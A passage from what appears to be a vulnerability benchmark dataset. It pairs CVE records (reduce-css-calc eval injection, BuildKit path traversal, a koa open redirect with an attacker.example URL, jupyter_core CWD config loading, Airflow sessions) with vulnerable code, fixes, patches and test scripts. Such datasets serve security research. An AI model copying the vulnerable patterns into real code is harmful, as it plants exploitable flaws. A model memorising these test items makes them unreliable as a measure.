This makes cross sites scripting (XSS) possible on the client and arbitrary code injection possible on the server and user input is passed to the `calc` function.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}}, "repo": "https://github.com/MoOx/reduce-css-calc", "patch_url": ["https://github.com/MoOx/reduce-css-calc/commit/aebe8f7adce937c0fec4c1315e4113ef74cadb6a"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_26_1", "commit": "da7bce7d90af3ebde50295f291fa445c7b56460e", "file_path": "index.js", "start_line": 40, "end_line": 96, "snippet": " function evaluateExpression (expression, functionIdentifier, call) {\n if (stack++ > MAX_STACK) {\n stack = 0\n throw new Error(\"Call stack overflow for \" + call)\n }\n\n if (expression === \"\") {\n throw new Error(functionIdentifier + \"(): '\" + call + \"' must contain a non-whitespace string\")\n }\n\n expression = evaluateNestedExpression(expression, call)\n\n var units = getUnitsInExpression(expression)\n\n // If the expression contains multiple units or CSS variables,\n // then let the expression be (i.e. browser calc())\n if (units.length > 1 || expression.indexOf(\"var(\") > -1) {\n return functionIdentifier + \"(\" + expression + \")\"\n }\n\n var unit = units[0] || \"\"\n\n if (unit === \"%\") {\n // Convert percentages to numbers, to handle expressions like: 50% * 50% (will become: 25%):\n // console.log(expression)\n expression = expression.replace(/\\b[0-9\\.]+%/g, function(percent) {\n return parseFloat(percent.slice(0, -1)) * 0.01\n })\n }\n\n // Remove units in expression:\n var toEvaluate = expression.replace(new RegExp(unit, \"gi\"), \"\")\n var result\n\n try {\n result = eval(toEvaluate)\n }\n catch (e) {\n return functionIdentifier + \"(\" + expression + \")\"\n }\n\n // Transform back to a percentage result:\n if (unit === \"%\") {\n result *= 100\n }\n\n // adjust rounding shit\n // (0.1 * 0.2 === 0.020000000000000004)\n if (functionIdentifier.length || unit === \"%\") {\n result = Math.round(result * decimalPrecision) / decimalPrecision\n }\n\n // Add unit\n result += unit\n\n return result\n }"}], "fix_func": [{"id": "fix_js_26_1", "commit": "aebe8f7adce937c0fec4c1315e4113ef74cadb6a", "file_path": "index.js", "start_line": 45, "end_line": 101, "snippet": " function evaluateExpression (expression, functionIdentifier, call) {\n if (stack++ > MAX_STACK) {\n stack = 0\n throw new Error(\"Call stack overflow for \" + call)\n }\n\n if (expression === \"\") {\n throw new Error(functionIdentifier + \"(): '\" + call + \"' must contain a non-whitespace string\")\n }\n\n expression = evaluateNestedExpression(expression, call)\n\n var units = getUnitsInExpression(expression)\n\n // If the expression contains multiple units or CSS variables,\n // then let the expression be (i.e. 
browser calc())\n if (units.length > 1 || expression.indexOf(\"var(\") > -1) {\n return functionIdentifier + \"(\" + expression + \")\"\n }\n\n var unit = units[0] || \"\"\n\n if (unit === \"%\") {\n // Convert percentages to numbers, to handle expressions like: 50% * 50% (will become: 25%):\n // console.log(expression)\n expression = expression.replace(/\\b[0-9\\.]+%/g, function(percent) {\n return parseFloat(percent.slice(0, -1)) * 0.01\n })\n }\n\n // Remove units in expression:\n var toEvaluate = expression.replace(new RegExp(unit, \"gi\"), \"\")\n var result\n\n try {\n result = mexp.eval(toEvaluate)\n }\n catch (e) {\n return functionIdentifier + \"(\" + expression + \")\"\n }\n\n // Transform back to a percentage result:\n if (unit === \"%\") {\n result *= 100\n }\n\n // adjust rounding shit\n // (0.1 * 0.2 === 0.020000000000000004)\n if (functionIdentifier.length || unit === \"%\") {\n result = Math.round(result * decimalPrecision) / decimalPrecision\n }\n\n // Add unit\n result += unit\n\n return result\n }"}, {"id": "fix_js_26_2", "commit": "aebe8f7adce937c0fec4c1315e4113ef74cadb6a", "file_path": "index.js", "start_line": 35, "end_line": 37, "snippet": " // CSS allow to omit 0 for 0.* values,\n // but math-expression-evaluator does not\n value = value.replace(/\\s(\\.[0-9])/g, \" 0$1\")"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -33,7 +33,7 @@\n var result\n \n try {\n- result = eval(toEvaluate)\n+ result = mexp.eval(toEvaluate)\n }\n catch (e) {\n return functionIdentifier + \"(\" + expression + \")\"\n\n--- /dev/null\n+++ b/index.js\n@@ -0,0 +1,3 @@\n+ // CSS allow to omit 0 for 0.* values,\n+ // but math-expression-evaluator does not\n+ value = value.replace(/\\s(\\.[0-9])/g, \" 0$1\")\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2016-10548:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/reduce-css-calc\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest --forceExit ./poc\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2016-10548:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/reduce-css-calc\ngit apply --whitespace=nowarn /workspace/fix.patch\nnpm test\n"} {"cve_id": "CVE-2024-23652", "cve_description": "BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit frontend or Dockerfile using RUN --mount could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system. The issue has been fixed in v0.12.5. 
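For the CVE-2016-10548 (reduce-css-calc) record that closes above: the fix replaces `eval()` with a dedicated math-expression evaluator (`mexp.eval`). An equivalent idea sketched in Python, interpreting only arithmetic AST nodes through an operator table so no general code path exists at all:

```python
import ast
import operator

OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
       ast.Mult: operator.mul, ast.Div: operator.truediv,
       ast.USub: operator.neg, ast.UAdd: operator.pos}

def calc(expr: str) -> float:
    # Walk the expression tree; anything but numbers and the
    # operators above is rejected instead of being executed.
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in OPS:
            return OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in OPS:
            return OPS[type(node.op)](walk(node.operand))
        raise ValueError("only plain arithmetic is allowed")
    return walk(ast.parse(expr, mode="eval").body)

print(calc("100 * 0.5 - 10"))   # 40.0
# calc("__import__('os')") raises ValueError instead of running code
```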
Workarounds include avoiding using BuildKit frontends from an untrusted source or building an untrusted Dockerfile containing RUN --mount feature.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/moby/buildkit", "patch_url": ["https://github.com/moby/buildkit/commit/23bebc4a180b84ba18733f545e7559e10c439ac3"], "programing_language": "Go", "vul_func": [{"id": "vul_go_163_1", "commit": "6b2dfbc", "file_path": "executor/stubs.go", "start_line": 15, "end_line": 96, "snippet": "func MountStubsCleaner(ctx context.Context, dir string, mounts []Mount, recursive bool) func() {\n\tnames := []string{\"/etc/resolv.conf\", \"/etc/hosts\"}\n\n\tfor _, m := range mounts {\n\t\tnames = append(names, m.Dest)\n\t}\n\n\tpaths := make([]string, 0, len(names))\n\n\tfor _, p := range names {\n\t\tp = filepath.Join(\"/\", p)\n\t\tif p == \"/\" {\n\t\t\tcontinue\n\t\t}\n\t\trealPath, err := fs.RootPath(dir, p)\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\n\t\tfor {\n\t\t\t_, err = os.Lstat(realPath)\n\t\t\tif !(errors.Is(err, os.ErrNotExist) || errors.Is(err, syscall.ENOTDIR)) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tpaths = append(paths, realPath)\n\n\t\t\tif !recursive {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\trealPathNext := filepath.Dir(realPath)\n\t\t\tif realPath == realPathNext {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\trealPath = realPathNext\n\t\t}\n\t}\n\n\treturn func() {\n\t\tfor _, p := range paths {\n\t\t\tst, err := os.Lstat(p)\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif st.IsDir() {\n\t\t\t\tentries, err := os.ReadDir(p)\n\t\t\t\tif err != nil {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tif len(entries) != 0 {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t} else if st.Size() != 0 {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// Back up the timestamps of the dir for reproducible builds\n\t\t\t// https://github.com/moby/buildkit/issues/3148\n\t\t\tdir := filepath.Dir(p)\n\t\t\tdirSt, err := os.Stat(dir)\n\t\t\tif err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to stat %q (parent of mount stub %q)\", dir, p)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tmtime := dirSt.ModTime()\n\t\t\tatime, err := system.Atime(dirSt)\n\t\t\tif err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to stat atime of %q (parent of mount stub %q)\", dir, p)\n\t\t\t\tatime = mtime\n\t\t\t}\n\n\t\t\tif err := os.Remove(p); err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to remove mount stub %q\", p)\n\t\t\t}\n\n\t\t\t// Restore the timestamps of the dir\n\t\t\tif err := os.Chtimes(dir, atime, mtime); err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to restore time time mount stub timestamp (os.Chtimes(%q, %v, %v))\", dir, atime, mtime)\n\t\t\t}\n\t\t}\n\t}\n}"}], "fix_func": [{"id": "fix_go_163_1", "commit": "23bebc4", "file_path": "executor/stubs.go", "start_line": 16, "end_line": 106, "snippet": "func MountStubsCleaner(ctx context.Context, dir string, mounts []Mount, recursive bool) func() {\n\tnames := []string{\"/etc/resolv.conf\", \"/etc/hosts\"}\n\n\tfor _, m := range mounts {\n\t\tnames = append(names, m.Dest)\n\t}\n\n\tpaths := make([]string, 0, 
len(names))\n\n\tfor _, p := range names {\n\t\tp = filepath.Join(\"/\", p)\n\t\tif p == \"/\" {\n\t\t\tcontinue\n\t\t}\n\t\trealPath, err := fs.RootPath(dir, p)\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\n\t\tfor {\n\t\t\t_, err = os.Lstat(realPath)\n\t\t\tif !(errors.Is(err, os.ErrNotExist) || errors.Is(err, syscall.ENOTDIR)) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tpaths = append(paths, realPath)\n\n\t\t\tif !recursive {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\trealPathNext := filepath.Dir(realPath)\n\t\t\tif realPath == realPathNext || realPathNext == dir {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\trealPath = realPathNext\n\t\t}\n\t}\n\n\treturn func() {\n\t\tfor _, p := range paths {\n\t\t\tp, err := fs.RootPath(dir, strings.TrimPrefix(p, dir))\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tst, err := os.Lstat(p)\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif st.IsDir() {\n\t\t\t\tentries, err := os.ReadDir(p)\n\t\t\t\tif err != nil {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tif len(entries) != 0 {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t} else if st.Size() != 0 {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// Back up the timestamps of the dir for reproducible builds\n\t\t\t// https://github.com/moby/buildkit/issues/3148\n\t\t\tparent := filepath.Dir(p)\n\t\t\tif realPath, err := fs.RootPath(dir, strings.TrimPrefix(parent, dir)); err != nil || realPath != parent {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tdirSt, err := os.Stat(parent)\n\t\t\tif err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to stat %q (parent of mount stub %q)\", dir, p)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tmtime := dirSt.ModTime()\n\t\t\tatime, err := system.Atime(dirSt)\n\t\t\tif err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to stat atime of %q (parent of mount stub %q)\", dir, p)\n\t\t\t\tatime = mtime\n\t\t\t}\n\n\t\t\tif err := os.Remove(p); err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to remove mount stub %q\", p)\n\t\t\t}\n\n\t\t\t// Restore the timestamps of the dir\n\t\t\tif err := os.Chtimes(parent, atime, mtime); err != nil {\n\t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to restore time time mount stub timestamp (os.Chtimes(%q, %v, %v))\", dir, atime, mtime)\n\t\t\t}\n\t\t}\n\t}\n}"}], "vul_patch": "--- a/executor/stubs.go\n+++ b/executor/stubs.go\n@@ -29,7 +29,7 @@\n \t\t\t}\n \n \t\t\trealPathNext := filepath.Dir(realPath)\n-\t\t\tif realPath == realPathNext {\n+\t\t\tif realPath == realPathNext || realPathNext == dir {\n \t\t\t\tbreak\n \t\t\t}\n \t\t\trealPath = realPathNext\n@@ -38,6 +38,11 @@\n \n \treturn func() {\n \t\tfor _, p := range paths {\n+\t\t\tp, err := fs.RootPath(dir, strings.TrimPrefix(p, dir))\n+\t\t\tif err != nil {\n+\t\t\t\tcontinue\n+\t\t\t}\n+\n \t\t\tst, err := os.Lstat(p)\n \t\t\tif err != nil {\n \t\t\t\tcontinue\n@@ -56,8 +61,12 @@\n \n \t\t\t// Back up the timestamps of the dir for reproducible builds\n \t\t\t// https://github.com/moby/buildkit/issues/3148\n-\t\t\tdir := filepath.Dir(p)\n-\t\t\tdirSt, err := os.Stat(dir)\n+\t\t\tparent := filepath.Dir(p)\n+\t\t\tif realPath, err := fs.RootPath(dir, strings.TrimPrefix(parent, dir)); err != nil || realPath != parent {\n+\t\t\t\tcontinue\n+\t\t\t}\n+\n+\t\t\tdirSt, err := os.Stat(parent)\n \t\t\tif err != nil {\n \t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to stat %q (parent of mount stub %q)\", dir, p)\n \t\t\t\tcontinue\n@@ -74,7 +83,7 @@\n \t\t\t}\n \n \t\t\t// Restore the timestamps of the dir\n-\t\t\tif err := os.Chtimes(dir, atime, mtime); err != nil {\n+\t\t\tif err := 
os.Chtimes(parent, atime, mtime); err != nil {\n \t\t\t\tbklog.G(ctx).WithError(err).Warnf(\"Failed to restore time time mount stub timestamp (os.Chtimes(%q, %v, %v))\", dir, atime, mtime)\n \t\t\t}\n \t\t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23384", "cve_description": "The package koa-remove-trailing-slashes before 2.0.2 are vulnerable to Open Redirect via the use of trailing double slashes in the URL when accessing the vulnerable endpoint (such as https://example.com//attacker.example/). The vulnerable code is in index.js::removeTrailingSlashes(), as the web server uses relative URLs instead of absolute URLs.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/vgno/koa-remove-trailing-slashes", "patch_url": ["https://github.com/vgno/koa-remove-trailing-slashes/commit/e7ce4000e9fe4d957332df1056640a22ebea28ee"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_3_1", "commit": "b7da362", "file_path": "index.js", "start_line": 5, "end_line": 52, "snippet": "function removeTrailingSlashes(opts) {\n opts = opts || {};\n\n if (opts.defer !== false) {\n opts.defer = opts.defer || true;\n }\n\n if (opts.chained !== false) {\n opts.chained = opts.chained || true;\n }\n\n return async function(ctx, next) {\n if (opts.defer) {\n await next();\n }\n\n let path;\n let querystring = '';\n\n // We have already done a redirect and we will continue if we are in chained mode\n if (opts.chained && ctx.status === 301) {\n const location = ctx.response.get('Location') || '';\n\n // We can't use ctx.querystring because it may not be up to date\n const parsedLocation = location.match(/\\?(.*)$/);\n if (parsedLocation && parsedLocation[1]) {\n querystring = parsedLocation[1];\n }\n\n path = getPath(location, querystring);\n } else if (ctx.status !== 301) {\n querystring = ctx.querystring;\n path = getPath(ctx.originalUrl, ctx.querystring);\n }\n\n if (path && haveSlash(path)) {\n path = path.slice(0, -1);\n const query = querystring.length ? '?' + querystring : '';\n\n ctx.status = 301;\n ctx.redirect(path + query);\n }\n\n if (!opts.defer) {\n await next();\n }\n };\n}"}], "fix_func": [{"id": "fix_js_3_1", "commit": "e7ce400", "file_path": "index.js", "start_line": 5, "end_line": 56, "snippet": "function removeTrailingSlashes(opts) {\n opts = opts || {};\n\n if (opts.defer !== false) {\n opts.defer = opts.defer || true;\n }\n\n if (opts.chained !== false) {\n opts.chained = opts.chained || true;\n }\n\n return async function(ctx, next) {\n if (opts.defer) {\n await next();\n }\n\n let path;\n let querystring = '';\n\n // We have already done a redirect and we will continue if we are in chained mode\n if (opts.chained && ctx.status === 301) {\n const location = ctx.response.get('Location') || '';\n\n // We can't use ctx.querystring because it may not be up to date\n const parsedLocation = location.match(/\\?(.*)$/);\n if (parsedLocation && parsedLocation[1]) {\n querystring = parsedLocation[1];\n }\n\n path = getPath(location, querystring);\n } else if (ctx.status !== 301) {\n querystring = ctx.querystring;\n path = getPath(ctx.originalUrl, ctx.querystring);\n }\n\n if (path && haveSlash(path)) {\n path = path.slice(0, -1);\n const query = querystring.length ? '?' 
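For the CVE-2024-23652 (BuildKit) record that closes above (the CVE-2021-23384 record continues below): the key change is re-resolving every stub path against the container root immediately before deletion, inside the cleanup closure. A hedged Python sketch of that re-check; note that `os.path.realpath` only approximates `fs.RootPath`'s scoped symlink resolution:

```python
import os

def remove_stub(rootfs: str, candidate: str) -> None:
    # Re-resolve at deletion time; a path swapped via symlink after the
    # earlier check could otherwise point at the host filesystem.
    resolved = os.path.realpath(os.path.join(rootfs, candidate.lstrip("/")))
    root = os.path.realpath(rootfs)
    if os.path.commonpath([resolved, root]) != root:
        return  # escaped the root: refuse to delete
    if os.path.isfile(resolved) and os.path.getsize(resolved) == 0:
        os.remove(resolved)  # only empty stub files are cleaned up
```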
+ querystring : '';\n\n const newURL = new URL(path + query, ctx.request.URL);\n\n if (ctx.origin === newURL.origin) {\n ctx.status = 301;\n ctx.redirect(path + query);\n }\n }\n\n if (!opts.defer) {\n await next();\n }\n };\n}"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -37,8 +37,12 @@\n path = path.slice(0, -1);\n const query = querystring.length ? '?' + querystring : '';\n \n- ctx.status = 301;\n- ctx.redirect(path + query);\n+ const newURL = new URL(path + query, ctx.request.URL);\n+\n+ if (ctx.origin === newURL.origin) {\n+ ctx.status = 301;\n+ ctx.redirect(path + query);\n+ }\n }\n \n if (!opts.defer) {\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-23384:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/koa-remove-trailing-slashes\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnpm test\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-23384:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/koa-remove-trailing-slashes\ngit apply --whitespace=nowarn /workspace/fix.patch\nnpx mocha --grep \"should work in a normal scenarion|should not redirect on url that already have been modified|should not redirect on url that is the root|should not redirect on url and url has no trailing slash|should not redirect on url with query and path has no trailing slash\""} {"cve_id": "CVE-2022-39286", "cve_description": "Jupyter Core is a package for the core common functionality of Jupyter projects. Jupyter Core prior to version 4.11.2 contains an arbitrary code execution vulnerability in `jupyter_core` that stems from `jupyter_core` executing untrusted files in CWD. This vulnerability allows one user to run code as another. Version 4.11.2 contains a patch for this issue. 
There are no known workarounds.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/jupyter/jupyter_core", "patch_url": ["https://github.com/jupyter/jupyter_core/commit/1118c8ce01800cb689d51f655f5ccef19516e283"], "programing_language": "Python", "vul_func": [{"id": "vul_py_45_1", "commit": "d3f61f3", "file_path": "jupyter_core/application.py", "start_line": 88, "end_line": 93, "snippet": " def config_file_paths(self):\n path = jupyter_config_path()\n if self.config_dir not in path:\n path.insert(0, self.config_dir)\n path.insert(0, os.getcwd())\n return path"}], "fix_func": [{"id": "fix_py_45_1", "commit": "1118c8ce01800cb689d51f655f5ccef19516e283", "file_path": "jupyter_core/application.py", "start_line": 88, "end_line": 93, "snippet": " def config_file_paths(self):\n path = jupyter_config_path()\n if self.config_dir not in path:\n # Insert config dir as first item.\n path.insert(0, self.config_dir)\n return path"}], "vul_patch": "--- a/jupyter_core/application.py\n+++ b/jupyter_core/application.py\n@@ -1,6 +1,6 @@\n def config_file_paths(self):\n path = jupyter_config_path()\n if self.config_dir not in path:\n+ # Insert config dir as first item.\n path.insert(0, self.config_dir)\n- path.insert(0, os.getcwd())\n return path\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-39286:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/jupyter_core\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-39286/bin/python -m pytest jupyter_core/tests/test_application.py::test_load_config jupyter_core/tests/test_application.py::test_load_config_no_cwd jupyter_core/tests/test_application.py::test_load_bad_config -p no:warning --disable-warnings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-39286:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/jupyter_core\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-39286/bin/python -m pytest jupyter_core/tests/test_application.py -k \"not test_load_config\" -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2020-17526", "cve_description": "Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. 
This does not affect users who have changed the default value for `[webserver] secret_key` config.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/apache/airflow", "patch_url": ["https://github.com/apache/airflow/commit/a8900fa5f2b8963e9f57ba4ae5520a5d339aeaad", "https://github.com/apache/airflow/commit/fe6d00a54f83468e296777d3b83b65a2ae7169ec", "https://github.com/apache/airflow/commit/6b065840323f9a4fc8e372b458d26e419e4fa99b", "https://github.com/apache/airflow/commit/2f3b1c780472afd4c8a93633e6633feb7083792e", "https://github.com/apache/airflow/commit/97b2735d65e95c4633966667b6db3908540f3937", "https://github.com/apache/airflow/commit/9e01476a50b9be27c4b1e6c6e24d36f290629195", "https://github.com/apache/airflow/commit/dfa7b26ddaca80ee8fd9915ee9f6eac50fac77f6"], "programing_language": "Python", "vul_func": [{"id": "vul_py_89_1", "commit": "2f3b1c7", "file_path": "airflow/www_rbac/app.py", "start_line": "50", "end_line": "280", "snippet": "def create_app(config=None, session=None, testing=False, app_name=\"Airflow\"):\n global app, appbuilder\n app = Flask(__name__)\n if conf.getboolean('webserver', 'ENABLE_PROXY_FIX'):\n app.wsgi_app = ProxyFix(\n app.wsgi_app,\n num_proxies=conf.get(\"webserver\", \"PROXY_FIX_NUM_PROXIES\", fallback=None),\n x_for=conf.getint(\"webserver\", \"PROXY_FIX_X_FOR\", fallback=1),\n x_proto=conf.getint(\"webserver\", \"PROXY_FIX_X_PROTO\", fallback=1),\n x_host=conf.getint(\"webserver\", \"PROXY_FIX_X_HOST\", fallback=1),\n x_port=conf.getint(\"webserver\", \"PROXY_FIX_X_PORT\", fallback=1),\n x_prefix=conf.getint(\"webserver\", \"PROXY_FIX_X_PREFIX\", fallback=1)\n )\n app.secret_key = conf.get('webserver', 'SECRET_KEY')\n app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(minutes=settings.get_session_lifetime_config())\n\n app.config.from_pyfile(settings.WEBSERVER_CONFIG, silent=True)\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n app.config['APP_NAME'] = app_name\n app.config['TESTING'] = testing\n\n app.config['SESSION_COOKIE_HTTPONLY'] = True\n app.config['SESSION_COOKIE_SECURE'] = conf.getboolean('webserver', 'COOKIE_SECURE')\n app.config['SESSION_COOKIE_SAMESITE'] = conf.get('webserver', 'COOKIE_SAMESITE')\n\n if config:\n app.config.from_mapping(config)\n\n if 'SQLALCHEMY_ENGINE_OPTIONS' not in app.config:\n app.config['SQLALCHEMY_ENGINE_OPTIONS'] = settings.prepare_engine_args()\n\n csrf.init_app(app)\n\n db = SQLA(app)\n\n from airflow import api\n api.load_auth()\n api.API_AUTH.api_auth.init_app(app)\n\n # flake8: noqa: F841\n cache = Cache(app=app, config={'CACHE_TYPE': 'filesystem', 'CACHE_DIR': '/tmp'})\n\n from airflow.www_rbac.blueprints import routes\n app.register_blueprint(routes)\n\n configure_logging()\n configure_manifest_files(app)\n\n with app.app_context():\n from airflow.www_rbac.security import AirflowSecurityManager\n security_manager_class = 
app.config.get('SECURITY_MANAGER_CLASS') or \\\n AirflowSecurityManager\n\n if not issubclass(security_manager_class, AirflowSecurityManager):\n raise Exception(\n \"\"\"Your CUSTOM_SECURITY_MANAGER must now extend AirflowSecurityManager,\n not FAB's security manager.\"\"\")\n\n appbuilder = AppBuilder(\n app,\n db.session if not session else session,\n security_manager_class=security_manager_class,\n base_template='airflow/master.html',\n update_perms=conf.getboolean('webserver', 'UPDATE_FAB_PERMS'))\n\n def init_views(appbuilder):\n from airflow.www_rbac import views\n # Remove the session from scoped_session registry to avoid\n # reusing a session with a disconnected connection\n appbuilder.session.remove()\n appbuilder.add_view_no_menu(views.Airflow())\n appbuilder.add_view_no_menu(views.DagModelView())\n appbuilder.add_view(views.DagRunModelView,\n \"DAG Runs\",\n category=\"Browse\",\n category_icon=\"fa-globe\")\n appbuilder.add_view(views.JobModelView,\n \"Jobs\",\n category=\"Browse\")\n appbuilder.add_view(views.LogModelView,\n \"Logs\",\n category=\"Browse\")\n appbuilder.add_view(views.SlaMissModelView,\n \"SLA Misses\",\n category=\"Browse\")\n appbuilder.add_view(views.TaskInstanceModelView,\n \"Task Instances\",\n category=\"Browse\")\n appbuilder.add_view(views.TaskRescheduleModelView,\n \"Task Reschedules\",\n category=\"Browse\")\n appbuilder.add_view(views.ConfigurationView,\n \"Configurations\",\n category=\"Admin\",\n category_icon=\"fa-user\")\n appbuilder.add_view(views.ConnectionModelView,\n \"Connections\",\n category=\"Admin\")\n appbuilder.add_view(views.PoolModelView,\n \"Pools\",\n category=\"Admin\")\n appbuilder.add_view(views.VariableModelView,\n \"Variables\",\n category=\"Admin\")\n appbuilder.add_view(views.XComModelView,\n \"XComs\",\n category=\"Admin\")\n\n if \"dev\" in version.version:\n airflow_doc_site = \"https://airflow.readthedocs.io/en/latest\"\n else:\n airflow_doc_site = 'https://airflow.apache.org/docs/{}'.format(version.version)\n\n appbuilder.add_link(\"Documentation\",\n href=airflow_doc_site,\n category=\"Docs\",\n category_icon=\"fa-cube\")\n appbuilder.add_link(\"GitHub\",\n href='https://github.com/apache/airflow',\n category=\"Docs\")\n appbuilder.add_view(views.VersionView,\n 'Version',\n category='About',\n category_icon='fa-th')\n\n def integrate_plugins():\n \"\"\"Integrate plugins to the context\"\"\"\n from airflow.plugins_manager import (\n flask_appbuilder_views, flask_appbuilder_menu_links\n )\n\n for v in flask_appbuilder_views:\n log.debug(\"Adding view %s\", v[\"name\"])\n appbuilder.add_view(v[\"view\"],\n v[\"name\"],\n category=v[\"category\"])\n for ml in sorted(flask_appbuilder_menu_links, key=lambda x: x[\"name\"]):\n log.debug(\"Adding menu link %s\", ml[\"name\"])\n appbuilder.add_link(ml[\"name\"],\n href=ml[\"href\"],\n category=ml[\"category\"],\n category_icon=ml[\"category_icon\"])\n\n integrate_plugins()\n # Garbage collect old permissions/views after they have been modified.\n # Otherwise, when the name of a view or menu is changed, the framework\n # will add the new Views and Menus names to the backend, but will not\n # delete the old ones.\n\n def init_plugin_blueprints(app):\n from airflow.plugins_manager import flask_blueprints\n\n for bp in flask_blueprints:\n log.debug(\"Adding blueprint %s:%s\", bp[\"name\"], bp[\"blueprint\"].import_name)\n app.register_blueprint(bp[\"blueprint\"])\n\n init_views(appbuilder)\n init_plugin_blueprints(app)\n\n if conf.getboolean('webserver', 'UPDATE_FAB_PERMS'):\n 
